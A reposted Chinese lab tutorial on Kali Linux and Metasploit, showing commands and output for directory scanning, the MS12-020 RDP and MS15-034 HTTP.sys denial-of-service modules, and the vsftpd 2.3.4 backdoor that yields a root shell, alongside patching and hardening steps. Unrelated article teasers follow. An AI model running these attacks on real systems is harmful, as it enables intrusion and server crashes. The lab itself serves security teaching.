kali系统渗透

news2024/11/28 14:10:40

用kali远程ssh时,如果不能的话 按照以下方法

  1. ┌──(root㉿kali)-[~]
  2. └─# mkdir ~/.ssh
  3. ┌──(root㉿kali)-[~]
  4. └─# vim ~/.ssh/config
  5. Host *
  6. HostkeyAlgorithms +ssh-rsa
  7. PubkeyAcceptedKeyTypes +ssh-rsa

msfconlole -q   //进入马上发不显示内容,所以加个q

msf6 > workspace -v      //显示工作区详细信息
msf6 > hosts             //查看扫描结果中的主机
msf6 > services -p 80    //查看扫描结果中80端口信息

1.网站目录扫描(Linux靶机)

    第一步:查找辅助脚本,使用辅助脚本

msf6 > search dir_scan             //搜索dir_scan脚本(找枪)
msf6 > use 0                       //使用编号为0的脚本(端枪)
msf6 > set rhosts 192.168.10.143   //设置攻击目标(瞄准)
msf6 > run                         //运行脚本(开枪)  
  [] Detecting error code
  [] Using code '404' as not found for 192.168.10.143
  [+] Found http://192.168.10.143:80/cgi-bin/ 404 (192.168.10.143)
  [+] Found http://192.168.10.143:80/doc/ 200 (192.168.10.143)
  [+] Found http://192.168.10.143:80/icons/ 404 (192.168.10.143)
  [+] Found http://192.168.10.143:80/index/ 404 (192.168.10.143)
  [+] Found http://192.168.10.143:80/phpMyAdmin/ 200 (192.168.10.143)
  [+] Found http://192.168.10.143:80/test/ 404 (192.168.10.143)        

    第二步:验证网站目录

在物理机浏览器访问: http://192.168.10.143/doc/ //查看网站列表

2、DOS攻击(Windows靶机)

        1)MS12-020 远程桌面漏洞-死亡之蓝

CVE-2012-0002(MS12-020)漏洞,利用Windows系统的远程桌面协议(RDP)存在缓存溢出漏洞,攻击者可通过向目标操作系统发送特定内容的RDP包造成操作系统蓝屏

        

msf6 > search  ms12-020          //搜索ms12-020脚本
Matching Modules
================
   #  Name                                              Disclosure Date  Rank    Check  Description
   -  ----                                              ---------------  ----    -----  -----------
   0  auxiliary/scanner/rdp/ms12_020_check                               normal  Yes    MS12-020 Microsoft Remote Desktop Checker
   1  auxiliary/dos/windows/rdp/ms12_020_maxchannelids  2012-03-16       normal  No     MS12-020 Microsoft Remote Desktop Use-After-Free DoS

  一个是ID为0  有一个关键词scanner ,发扫描的脚本
  一个是ID为1  有一个关键词dos  ,是拒绝服务攻击的脚本

msf6 > use 1                   //使用DOS攻击脚本    
msf6 auxiliary(scanner/rdp/ms12_020_check) > set rhosts 192.168.10.142        //设置攻击目标
msf6 auxiliary(scanner/rdp/ms12_020_check) > run                              //攻击

2)防御MS12-020漏洞

安装补丁Windows6.1-KB2621440-x64.msu

 

MSF漏洞利用Exploit应用

 CVE-2011-2523 vsftpd 2.3.4 后门漏洞(笑脸漏洞),此漏洞允许以root身份执行任意命令

msf6 > search vsftpd
msf6 > use 0
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 192.168.10.143
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run 
[*] 192.168.10.143:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 192.168.10.143:21 - USER: 331 Please specify the password.
[+] 192.168.10.143:21 - Backdoor service has been spawned, handling...
[+] 192.168.10.143:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.Command shell session 1 opened (0.0.0.0:0 -> 192.168.10.143:6200)    //侵入成功
  whoami                 //显示当前用户
  root
  pwd                    //查看当前目录
  /root

CVE-2015-1635漏洞攻防实战

CVE-2015-1635(MS15-034)漏洞存在于HTTP协议堆栈(HTTP.sys)中,攻击者只要发送恶意http请求数据包,就可能远程读取IIS服务器的内存数据,或使服务器系统蓝屏崩溃

补丁文件:Windows6.1-KB3042553-x64

1)漏洞扫描(OpenVAS报告)
2)用poc脚本去验证漏洞真实存在
3)MSF漏洞利用,DOS攻击服务器蓝屏
4)对IIS安全加固:关闭内核缓存
5)MSF漏洞利用,服务器不再蓝屏,成功防御了攻击
6)把内核缓存在开启(内核缓存可加快网站性能)
7)对系统进行加固:安装系统补丁
8)用POC脚本测试,发现提示目标服务器补丁已修复
9)MSF漏洞利用,发现目标服务器不在蓝屏

1、漏洞扫描

 2、POC 漏洞验证脚本

1)上传 cve-2015-1635.poc 到kali 系统

2)修改cve-2015-1635.poc 文件中的 ipaddr 为 win2k8 地址

ipAddr = "192.168.10.137"

3)开始验证

[root@kali ~] # python  cve-2015-1635.poc        //执行POC验证脚本
[*] Audit Started                 //审计开始
[!!] Looks VULN                   //看起来很脆弱(vulnerable)

3、漏洞利用

msf6 > search  ms15-034  
msf6 > use 0 
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.10.137
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > run
 //检查W2K8 主机是否蓝屏  

4、对IIS安全加固:关闭内核缓存

 5、MSF漏洞利用,服务器不再蓝屏,成功防御了攻击

sf6 > search ms15-034                                         
msf6 > use 0
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.10.137
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > run
 //再次使用攻击脚本去对目标服务器进行攻击,发现目标服务器不在蓝屏了

6、把内核缓存在开启(内核缓存可加快网站性能)

7、对系统进行加固:安装系统补丁

补丁:MS15-034-Windows6.1-KB3042553-x64-2008R2

如果安装不上,先安装SP1补丁集合(windows6.1-KB976932-X64)2012年12月发布 查看已安装补丁:命令提示符下执行systeminfo

8、用POC脚本测试,发现提示目标服务器补丁已修复

[root@kali ~] python  cve-2015-1635.poc 
[*] Audit Started        //开始审计
[*] Looks Patched        //看起来补丁已修复

9、MSF漏洞利用,发现目标服务器不在蓝屏

msf6 > search ms15-034
msf6 > use 0
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > set rhosts 192.168.10.137
msf6 auxiliary(dos/http/ms15_034_ulonglongadd) > run
[] Probably not vulnerable, will not dos it.      //可能没有漏洞,就不攻击他了

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/620193.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

编程实现人脸识别

1.更改url 用翔云平台下的人脸识别的API文档 把他贴到url中: 2.定义参数 (根据平台给定的这些串口接收参数来定义) key和secret在这里找: 3.指定post内容 把这部分定义成一个postString 4.字符串的拼接 sprintf函数调用的主…

使用粒子群优化算法(PSO)辨识锂电池二阶RC模型参数(附MATLAB代码)

目录 一、原理部分 二、代码详解部分 三、结果及分析 一、原理部分 PSO算法由美国学者于 1995 年提出,因其算法简单、效果良好,而在很多领域得到了广泛应用。该算法的起源是模拟鸟群的觅食过程,形成一种群体智能搜索算法。 其核心是&#…

使用Flask高效构建Web应用

1、聊聊Flask框架 Flask官方文档 Flask是Armin ronacher基于Python开发的微型Web框架,诞生于2010年,它依赖于jinja2模板和Werkzeug WSGI服务。Flask的核心简单易于扩展,它不会替你做出太多决策比如使用何种数据库或模板引擎,这些都…

抖音seo矩阵系统源码解析

抖音SEO矩阵系统源码是一种用于优化抖音视频内容的工具,可以帮助用户提高抖音视频的搜索排名和流量,从而增加视频曝光和转化率。该系统包括两部分,即数据收集和分析模块以及SEO策略和实施模块。 数据收集和分析模块主要负责从抖音平台上收集…

认识功能安全

01、什么是功能安全 1-背景简介 由于汽车的复杂性,整个行业正在致力于提供符合安全要求的零部件系统。比如,线控油门系统,当驾驶员踩下油门踏板,踏板上的传感器向控制器发送信号时,控制器会综合分析如发动机转速、车…

ERP系统实施,8个需要了解的关键绩效指标

实施ERP系统是一项复杂的、耗时的工作,但它也代表了企业重新思考其战略、目标和流程的绝佳机会。成功的ERP实施可以激发创新,改善企业的所有领域。例如,通过集中企业各部门不断增长的财务和业务数据,所有的决策者都在同一个页面上…

非煤矿山电子封条系统算法方案 opencv

非煤矿山电子封条系统算法部署方案是基于pythonopencv网络模型Ai视频图像识别技术,非煤矿山电子封条系统算法部署方案对出入井人员、人员变化及非煤矿山生产作业状态等状况,及时发现处理异常动态将自动发出警报。OpenCV的全称是Open Source Computer Vis…

亲身经历告诉你,0基础转行学Python,毕业就能15000

对生活现状的不满,对自己浑浑噩噩的厌恶,以及对互联网行业的憧憬,让我下定决心选择去黑马程序员开启转行之旅。 学科 | Python大数据开发 薪资 | 15000 时间总是在你回忆往事时才会觉得短暂,来黑马之前觉得六个月将是一段很漫长…

操作系统原理 —— 内存动态分区分配算法(二十一)

在上一个章节我们讲了内存连续分配的几种方式,有单一、固定、动态这三种,在固定、动态这种里面,操作系统会记录空闲分区表,这个表是用来记录当前空闲的内存。 那么在之后有新的进程装入内存,需要从空闲分区表中找到一…

从零手写操作系统之RVOS内存管理模块简单实现-02

从零手写操作系统之RVOS内存管理模块简单实现-02 内存管理分类内存映射表(Memory Map)Linker Script 链接脚本语法基于符号定义获取程序运行时内存分布 基于 Page 实现动态内存分配代码讲解调试 扩展 本系列参考: 学习开发一个RISC-V上的操作系统 - 汪辰 - 2021春 整…

qrcode.min.js下载

目录 qrcode.min.js下载步骤: 去官网 下载后解压: 如下:就可以得到 qrcode.min.js文件了 qrcode.min.js下载步骤: 去官网 可以前往qrcode官网(https://davidshimjs.github.io/qrcodejs/)下载qrcode.m…

培训pytorch(未完善) bp算法原理

生物的神经元 接受外部的刺激 神经网络工作流程演示

MySQL高可用集群解决方案之:MySql Cluster搭建

MySQL是当前使用最广泛的关系型数据库管理系统之一,但MySQL在高并发访问和大量数据处理方面存在较为明显的性能瓶颈。为了解决MySQL单点故障带来的不便和可扩展性问题,我们需要构建稳定性极高的MySQL集群方案。本文将介绍一种快速搭建MySQL集群的解决方案…

机器学习聚类算法——BIRCH算法、DBSCAN算法、OPTICS算法

系列文章目录 前言 本文主要介绍BIRCH算法、DBSCAN算法、OPTICS算法,以及相关案例举例,以下案例仅供参考 一、BIRCH算法 1.1、BIRCH算法简介 BIRCH(Balanced Iterative Reducing and Clustering using Hierarchies,平衡迭代规约…

Kubernetes(K8s)各组件白话解释

深入springboot怎么启动tomcat NameSpacePodDeployment1. 创建多个副本2. 扩容/缩容3. 滚动更新4. 版本回退 ServiceClusterIpNodePort Ingress 个人笔记,仅供参考。 来源于尚硅谷视频 转载请评论。 NameSpace 名称空间,在K8s中用于隔离资源。对不同资源…

第十一届“泰迪杯”数据挖掘挑战赛成绩公示

第十一届“泰迪杯” 数据挖掘挑战赛成绩公示 第十一届“泰迪杯”数据挖掘挑战赛历时两个月顺利结束。竞赛采用盲审(屏蔽参赛者信息;评审专家只能评阅非本区域作品;三位评阅专家同时评阅同一作品,超限调整后再取平均分&#xff0…

【小米的技术分享】数据库索引原理与底层数据结构解析

大家好,我是小米。今天我们来探讨一下数据库索引原理以及底层索引数据结构,同时还会介绍叶子节点存储的内容以及索引失效的情况。废话不多说,让我们开始吧! IO操作与索引 首先,我们先来了解一下IO操作对于数据库索引的…

【区块链 | L2】作为Layer2赛道的领跑者,如何理解 Arbitrum?

上周我们介绍了以太坊L2扩展解决方案Optimism,本周我们继续介绍另一个L2解决方案——Arbitrum。Arbitrum 是以太坊的一个 Optimistic Rollup L2 可扩展性解决方案。 Part.1 什么是Arbitrum? Arbitrum 是一个构建在以太坊之上的区块链网络。你可以使用 Arbitrum 链来做任何在…

长短连接对压测的影响有多大?!

【引言】 当我们进行压力测试时,长短连接是一个非常重要的参数。但是,你知道吗?长短连接对于压测结果有着非常大的影响!如果你不理解这个参数,那么你的压测结果可能会出现严重的偏差。 在这篇文章中,我将…

快速在linux上配置python3.9的环境以及可能报错的解决方案(python其它版本可同样方式安装)

一. linux安装python3.9 步骤1:安装系统依赖(重要) 这一步不执行,后面各种错误。 yum -y install zlib-devel bzip2-devel openssl-devel ncurses-devel sqlite-devel readline-devel tk-devel gdbm-devel db4-devel libpcap-d…